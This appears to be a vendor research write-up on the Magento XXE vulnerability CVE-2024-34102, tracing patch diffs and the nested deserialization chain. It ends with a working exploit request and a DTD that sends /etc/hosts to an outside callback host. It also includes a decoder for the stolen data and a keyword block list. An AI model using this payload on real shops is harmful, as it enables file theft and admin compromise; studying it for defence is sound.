Why nested deserialization is harmful: Magento XXE (CVE-2024-34102)


Magento is one of the most popular e-commerce solutions in use on the internet. It’s estimated that there are over 140,000 instances of Magento running as of late 2023. Adobe’s most recent advisory for Adobe Commerce / Magento, published on June 11th, 2024, highlighted a critical, pre-authentication XML entity injection issue (CVE-2024-34102), which Adobe rated as CVSS 9.8.

We were quite surprised that no public proof-of-concept existed when we read the advisory. Given the criticality of this issue, and to give customers of our Attack Surface Management Platform certainty about its exploitability, our security research team developed a proof-of-concept well before our customers could be exploited by malicious actors.

We believe this vulnerability is severe for the following reasons:

– It is possible to exfiltrate the app/etc/env.php file from Magento, which contains a cryptographic key used to sign JWTs used for authentication. An attacker can craft an administrator JWT and abuse Magento’s APIs as an admin user on affected installations.

– The vulnerability can be chained with recent research in PHP filter chains leading to RCE through the CVE-2024-2961 exploit, credit to Charles Fol.

– The broader impacts of XXE (any local file or remote URL’s contents can be exfiltrated).

We want to acknowledge Sergey Temnikov, the original author, for his excellent work in discovering this vulnerability. Shortly after this vulnerability was dubbed “CosmicString” by SanSec, he released a limited write-up of the issue, which discusses his methodology in discovering it but does not reveal the proof of concept. We highly recommend reading this write-up, as he explains Magento’s internal deserialization process and its inherent dangers.

As we tracked the public knowledge of this vulnerability, we found that SanSec’s original emergency mitigation could be bypassed, and Sergey’s first iteration of the “fixed” mitigation could also be bypassed. This led to both SanSec and Sergey updating their emergency hotfix mitigations over time.

This was interesting to observe, as it highlighted the importance and effectiveness of peer review for emergency hotfixes, and it makes the case that disclosing the technical details of a vulnerability matters to the broader security industry.

To understand the key differences between an unpatched version of Magento and a patched one, we downloaded the packages magento2-2.4.7.zip (unpatched) and magento2-2.4.7-p1.zip (patched) from https://github.com/magento/magento2/releases. Extracting these and then running DiffMerge on these two directories revealed a very important clue to discovering this vulnerability:

[Figure: Changes added to 2.4.7-p1]
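The directory comparison described above was done with DiffMerge, but the same first pass can be scripted. The following is a minimal sketch using Python's standard `filecmp` module; the function name `changed_files` and the report layout are our own illustrative choices, not part of the original workflow.

```python
import filecmp
from pathlib import Path


def changed_files(left: Path, right: Path) -> dict[str, list[str]]:
    """Recursively compare two directory trees and report the differences.

    Note: filecmp.dircmp compares files shallowly by default (size and
    modification time first), so treat the result as a starting point.
    """
    report = {"changed": [], "only_left": [], "only_right": []}

    def walk(cmp: filecmp.dircmp, prefix: str) -> None:
        # Files present on both sides whose contents differ.
        report["changed"] += [prefix + name for name in cmp.diff_files]
        # Entries that exist on one side only.
        report["only_left"] += [prefix + name for name in cmp.left_only]
        report["only_right"] += [prefix + name for name in cmp.right_only]
        # Descend into directories that exist on both sides.
        for name, sub in cmp.subdirs.items():
            walk(sub, f"{prefix}{name}/")

    walk(filecmp.dircmp(str(left), str(right)), "")
    return report
```

Calling `changed_files(Path("magento2-2.4.7"), Path("magento2-2.4.7-p1"))` on the two extracted releases would list the files worth opening in a visual diff tool.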

With the information that was publicly available, i.e., SanSec’s first patch (blocking dataIsURL inside the POST body) as well as the diff we can see in the image above, it was clear to us that this vulnerability was to do with instantiating a SimpleXMLElement. PHP’s documentation for this class revealed that dataIsURL is an argument that can be passed to the SimpleXMLElement constructor, which allows for loading XML from external sources.

The additional updates to the hotfix from Sergey revealed that you could not rely on blocking dataIsURL as the vulnerability was exploitable without this, and his mitigation focused on blocking the keyword sourceData.
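To illustrate why the choice of blocked keyword matters, here is a minimal sketch of a keyword check over a parsed JSON body. It is not SanSec's or Sergey's actual rule, which we have not reproduced here; the names `BLOCKED_KEYS`, `find_blocked_keys` and `is_suspicious` are hypothetical, and the case-insensitive comparison is an assumption.

```python
import json

# Assumption: keys are compared case-insensitively.
BLOCKED_KEYS = {"sourcedata", "dataisurl"}


def find_blocked_keys(node, path="$"):
    """Yield the JSON path of every blocked key, at any nesting depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key.lower() in BLOCKED_KEYS:
                yield child
            yield from find_blocked_keys(value, child)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from find_blocked_keys(value, f"{path}[{index}]")


def is_suspicious(body: str) -> bool:
    """Return True if the request body contains a blocked key."""
    try:
        return any(find_blocked_keys(json.loads(body)))
    except json.JSONDecodeError:
        return False  # not JSON; this sketch makes no claim about such bodies
```

A body that nests `sourceData` without ever mentioning `dataIsURL` is only flagged because `sourcedata` is in the set, which mirrors the reason the mitigation had to change. A check like this is a stopgap and not a replacement for the vendor patch.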

With all of this information, we spent most of our time setting up a development environment for Magento and then searching for a deserialization gadget that would lead us to the instantiation of a SimpleXMLElement with controllable arguments.

When it comes to complex deserialization issues, we highly suggest setting up a development environment with the ability to debug the code by setting breakpoints. For Magento 2, we utilized the following repo to bootstrap our development efforts. This docker image includes XDebug and is already configured for PhpStorm. After spinning up this docker image, we were able to install Magento and seed it with sample data using the following commands:

./scripts/composer create-project --repository-url=https://repo.magento.com/ magento/project-community-edition=2.4.7 /home/magento # 2.4.7 is the vulnerable version
./scripts/magento setup:install --base-url=http://magento2.test/ --db-host=mysql --db-name=magento_db --db-user=magento_user --db-password="PASSWD#" --admin-firstname=admin --admin-lastname=admin --admin-email=admin@example.com --admin-user=admin --admin-password=admin1! --language=en_US --currency=USD --timezone=America/Chicago --use-rewrites=1 --search-engine opensearch --opensearch-host=opensearch --opensearch-port=9200
./scripts/magento sampledata:deploy
./scripts/magento setup:upgrade

When searching through the Magento 2 code base for Simplexml\\Element.*sourceData, we identified the following locations that could be viable targets:

~/Downloads/magento2-2.4.7/app/code/Magento/Quote/Model/Quote/Address/Total/Collector.php:
   70       * @param \Magento\Store\Model\StoreManagerInterface $storeManager
   71       * @param \Magento\Quote\Model\Quote\Address\TotalFactory $totalFactory
   72:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   73       * @param mixed $store
   74       * @param SerializerInterface $serializer

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Config/Ordered.php:
   84       * @param \Psr\Log\LoggerInterface $logger
   85       * @param \Magento\Sales\Model\Config $salesConfig
   86:      * @param \Magento\Framework\Simplexml\Element $sourceData
   87       * @param SerializerInterface $serializer
   88       */

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Order/Total/Config/Base.php:
   44       * @param \Magento\Sales\Model\Config $salesConfig
   45       * @param \Magento\Sales\Model\Order\TotalFactory $orderTotalFactory
   46:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   47       * @param SerializerInterface $serializer
   48       */

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/Base.php:
   19  
   20      /**
   21:      * @param \Magento\Framework\Simplexml\Element|string $sourceData $sourceData
   22       */
   23      public function __construct($sourceData = null)

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/BaseFactory.php:
   26       * Create config model
   27       *
   28:      * @param string|\Magento\Framework\Simplexml\Element $sourceData
   29       * @return \Magento\Framework\App\Config\Base
   30       */
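The search above was run in an editor, but it is easy to reproduce from a script. The sketch below applies the same regular expression line by line across a source tree; `grep_tree` and its `suffix` parameter are illustrative names of our own.

```python
import re
from pathlib import Path

# Same expression as in the text: a literal backslash between
# "Simplexml" and "Element", then "sourceData" later on the line.
PATTERN = re.compile(r"Simplexml\\Element.*sourceData")


def grep_tree(root: Path, pattern: re.Pattern = PATTERN, suffix: str = ".php"):
    """Yield (relative path, line number, stripped line) for each match."""
    for path in sorted(root.rglob(f"*{suffix}")):
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for number, line in enumerate(text.splitlines(), start=1):
            if pattern.search(line):
                yield path.relative_to(root).as_posix(), number, line.strip()
```

Running `list(grep_tree(Path("magento2-2.4.7")))` should produce hits comparable to the listing above, assuming the tree is extracted in the working directory.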

From this list, we believed the candidate most likely to be reachable without authentication was Magento/Quote/Model/Quote/Address/Total/Collector.php. However, it was not obvious from reading the code alone how the nesting worked and how it allowed sourceData to be instantiated.

To make further headway, it was necessary for us to understand at a high level how the input deserialization works. For that, we looked at magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php and its _createFromArray method:

        $data = is_array($data) ? $data : [];
        // convert to string directly to avoid situations when $className is object
        // which implements __toString method like \ReflectionObject
        $className = (string) $className;
        $class = new ClassReflection($className);
        if (is_subclass_of($className, self::EXTENSION_ATTRIBUTES_TYPE)) {
            $className = substr($className, 0, -strlen('Interface'));
        }

        // Primary method: assign to constructor parameters
        $constructorArgs = $this->getConstructorData($className, $data);
        $object = $this->objectManager->create($className, $constructorArgs);

        // Secondary method: fallback to setter methods
        foreach ($data as $propertyName => $value) {
            // ... SNIP ...

At a high level, if Magento is parsing some input data and expects a field named address that contains a \Magento\Quote\Api\Data\Address, it will do the following:

– First, if the fields of the JSON match any of the names of the variables in the constructor of the class, pass that field as an argument;

– Second, if the name doesn’t match, instead look for a method on the class named set plus the field.

For example, if you passed the following JSON to the /rest/all/V1/guest-carts/test/estimate-shipping-methods endpoint:

{
    "address": {
        "data": [1, 2, 3],
        "BaseShippingAmount" : 123
    }
}

– The field data is in the constructor of the Address class as array $data = [], so it will be passed there.

– The Address class has a method setBaseShippingAmount, so after the class is instantiated it will call ->setBaseShippingAmount(123).
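The constructor-first, setter-second behaviour can be modelled in a few lines. This is a toy Python model of the idea, not Magento's implementation: the classes `Sink`, `Collector` and `Address` are hypothetical stand-ins, and only the key names are borrowed from the example request.

```python
import inspect

PRIMITIVES = (int, float, str, bool, list, dict)


def annotations_of(func) -> dict:
    """Map parameter name -> annotation, skipping `self`."""
    sig = inspect.signature(func)
    return {n: p.annotation for n, p in sig.parameters.items() if n != "self"}


def convert(hint, value):
    # A nested object instantiates whatever class the parameter is typed
    # as, using arguments chosen by the caller.
    typed = hint is not inspect.Parameter.empty and inspect.isclass(hint)
    if typed and hint not in PRIMITIVES and isinstance(value, dict):
        return create_from_dict(hint, value)
    return value


def create_from_dict(cls, data: dict):
    ctor = annotations_of(cls.__init__)
    # Primary: keys matching constructor parameter names become arguments.
    kwargs = {k: convert(ctor[k], v) for k, v in data.items() if k in ctor}
    obj = cls(**kwargs)
    # Secondary: remaining keys fall back to set<Key>() methods.
    for key, value in data.items():
        setter = getattr(obj, "set" + key[:1].upper() + key[1:], None)
        if key not in kwargs and callable(setter):
            hint = next(iter(annotations_of(setter).values()), None)
            setter(convert(hint, value))
    return obj


class Sink:  # hypothetical stand-in for a class with a risky constructor
    def __init__(self, data: str = "", options: int = 0):
        self.data, self.options = data, options


class Collector:  # hypothetical intermediate class
    def __init__(self, sourceData: Sink = None):
        self.source_data = sourceData


class Address:  # hypothetical, heavily simplified
    def __init__(self, data: list = None, totalCollector: Collector = None):
        self.data = data or []
        self.collector = totalCollector
        self.base_shipping_amount = None

    def setBaseShippingAmount(self, amount: float):
        self.base_shipping_amount = amount
```

With this model, `create_from_dict(Address, {"data": [1, 2, 3], "BaseShippingAmount": 123})` passes `data` to the constructor and then calls `setBaseShippingAmount(123)`. A nested object under `totalCollector` would instantiate `Collector`, and through it `Sink`, without the caller ever naming those classes.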

The danger comes from the fact that this is done recursively: if either the constructor or the setter takes a non-primitive type, such as another class, then the deserialization process is done recursively on that field. Looking at the constructor for the Address class, it has 37 parameters, and it’s clear the Magento developers did not intend for you to be able to instantiate all of these:

    public function __construct(
        Context $context,
        Registry $registry,
        ExtensionAttributesFactory $extensionFactory,
        AttributeValueFactory $customAttributeFactory,
        Data $directoryData,
        \Magento\Eav\Model\Config $eavConfig,
        \Magento\Customer\Model\Address\Config $addressConfig,
        RegionFactory $regionFactory,
        CountryFactory $countryFactory,
        AddressMetadataInterface $metadataService,
        AddressInterfaceFactory $addressDataFactory,
        RegionInterfaceFactory $regionDataFactory,
        DataObjectHelper $dataObjectHelper,
        ScopeConfigInterface $scopeConfig,
        \Magento\Quote\Model\Quote\Address\ItemFactory $addressItemFactory,
        \Magento\Quote\Model\ResourceModel\Quote\Address\Item\CollectionFactory $itemCollectionFactory,
        RateFactory $addressRateFactory,
        RateCollectorInterfaceFactory $rateCollector,
        CollectionFactory $rateCollectionFactory,
        RateRequestFactory $rateRequestFactory,
        CollectorFactory $totalCollectorFactory,
        TotalFactory $addressTotalFactory,
        Copy $objectCopyService,
        CarrierFactoryInterface $carrierFactory,
        Address\Validator $validator,
        Mapper $addressMapper,
        Address\CustomAttributeListInterface $attributeList,
        TotalsCollector $totalsCollector,
        TotalsReader $totalsReader,
        AbstractResource $resource = null,
        AbstractDb $resourceCollection = null,
        array $data = [],
        Json $serializer = null,
        StoreManagerInterface $storeManager = null,
        ?CompositeValidator $compositeValidator = null,
        ?CountryModelsCache $countryModelsCache = null,
        ?RegionModelsCache $regionModelsCache = null,
    ) {

This provides a huge surface for bugs. By traversing chains of constructors and setters, it is possible to instantiate a wide variety of internal classes that were never meant to be user-facing. And if any of those constructors or setters do dangerous things, such as in the case of SimpleXMLElement, this could lead to a security vulnerability. Further details on how to map out the pre-authentication endpoints and corresponding models can be found in Sergey’s write up.
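Traversing chains of constructors is, in effect, a graph search: classes are nodes and typed constructor parameters are edges. The sketch below runs a breadth-first search over a small hand-written graph. The graph is hypothetical: the parameter names are borrowed from the request shown later in this post, while the class names are shortened placeholders and not Magento's real class names.

```python
from collections import deque

# Hypothetical type graph: class -> {constructor parameter: class}.
TYPE_GRAPH = {
    "Address": {"totalsReader": "TotalsReader", "validator": "Validator"},
    "TotalsReader": {"collectorList": "CollectorList"},
    "CollectorList": {"totalCollector": "Collector"},
    "Collector": {"sourceData": "SimplexmlElement"},
    "Validator": {},
}


def find_chain(graph, start, sink):
    """Breadth-first search from start to sink.

    Returns the shortest list of parameter names, or None if the sink
    cannot be reached from the starting class.
    """
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        cls, path = queue.popleft()
        if cls == sink:
            return path
        for param, target in graph.get(cls, {}).items():
            if target not in seen:
                seen.add(target)
                queue.append((target, path + [param]))
    return None
```

In practice the graph would have to be built from reflection data for each class, which is what made a debugger and quick instrumentation so useful to us.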

The goal is now to find a chain of types in constructors that allow us to reach one of the Simplexml sinks identified earlier. Rather than trace the constructor manually for each class, we added the following line to magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php:

private function getConstructorData(string $className, array $data): array
    {
        $preferenceClass = $this->config->getPreference($className);
        $class = new ClassReflection($preferenceClass ?: $className);

        try {
            $constructor = $class->getMethod('__construct');
        } catch (\ReflectionException $e) {
            $constructor = null;
        }

        if ($constructor === null) {
            return [];
        }

        $res = [];
        $parameters = $constructor->getParameters();
++      var_dump($parameters);

This simple var_dump helped us to quickly understand all of the different parameters we could provide when calling the unauthenticated REST APIs based on the magic deserialisation logic that Magento had built.

By reading the names of the constructor parameters, we found that the pre-authentication endpoint /rest/all/V1/guest-carts/test/estimate-shipping-methods mentioned earlier was likely the best candidate for reaching sourceData.

Debugging the available parameters was made easier with our var_dump call, allowing us to quickly iterate on our payload with output as seen below:

  object(Laminas\Code\Reflection\ParameterReflection)#1176 (2) {
    ["name"]=>
    string(21) "totalCollectorFactory"
    ["isFromMethod":protected]=>
    bool(false)
  }

With further experimentation, we were able to develop the following payload, which instantiated a SimpleXMLElement with controllable arguments via the sourceData parameter:

POST /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods HTTP/2
Host: example.com
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json
Content-Length: 274

{
  "address": {
    "totalsReader": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://your_ip:9999/dtd.xml\"> %sp; %param1; ]> <r>&exfil;</r>",
            "options": 16
          }
        }
      }
    }
  }
}

With our DTD containing:

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://collabid.oastify.com/dtd.xml?%data;'>">

This resulted in the following:

Sweet, success!
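Because the DTD above wraps the file in a convert.base64-encode filter and appends it to the callback URL, the out-of-band request should carry the file contents as a base64 query string. Under that assumption, a minimal decoding sketch looks like this; `decode_exfil` is a hypothetical helper, and any input you pass it here is made-up sample data, not real output.

```python
import base64
from urllib.parse import urlsplit, unquote


def decode_exfil(request_target: str) -> str:
    """Return the decoded file contents carried in the query string."""
    # unquote() keeps '+' intact, which matters for base64 data.
    query = unquote(urlsplit(request_target).query)
    # Tolerate padding that was stripped somewhere along the way.
    padded = query + "=" * (-len(query) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")
```

The input would be the request target as logged by the callback server, for example the path and query of a request to /dtd.xml.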